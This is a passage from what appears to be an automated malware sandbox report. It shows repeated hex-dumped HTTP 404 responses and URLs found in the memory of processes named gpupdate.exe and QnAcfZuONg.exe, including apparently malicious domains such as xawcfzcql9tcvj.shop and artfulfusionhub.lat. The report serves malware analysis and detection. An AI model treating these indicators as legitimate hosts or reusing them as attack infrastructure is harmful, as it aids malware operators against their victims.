            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 16:47:34 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 16:47:36 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 16:47:39 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 16:47:45 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 
3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 16:47:47 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 
3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 16:47:50 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 
3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 16:47:53 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 
65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 16:47:58 GMTServer: ApacheContent-Length: 269Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 78 61 77 63 66 7a 63 71 6c 39 74 63 76 6a 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.xawcfzcql9tcvj.shop Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 16:48:01 GMTServer: ApacheContent-Length: 269Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 78 61 77 63 66 7a 63 71 6c 39 74 63 76 6a 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.xawcfzcql9tcvj.shop Port 80</address></body></html>
            Source: gpupdate.exe, 00000005.00000002.3891568008.0000000005D5A000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.00000000039BA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.pqnqxn.xyz
            Source: QnAcfZuONg.exe, 00000007.00000002.3892567751.00000000055B4000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.xawcfzcql9tcvj.shop
            Source: QnAcfZuONg.exe, 00000007.00000002.3892567751.00000000055B4000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.xawcfzcql9tcvj.shop/jug9/
            Source: gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: gpupdate.exe, 00000005.00000002.3891568008.000000000607E000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.0000000003CDE000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://artfulfusionhub.lat/qogc/?1Hg=gSefwjuKZsCuEGncBKSqgUjxJH
            Source: gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: gpupdate.exe, 00000005.00000002.3891568008.0000000006534000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.0000000004194000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
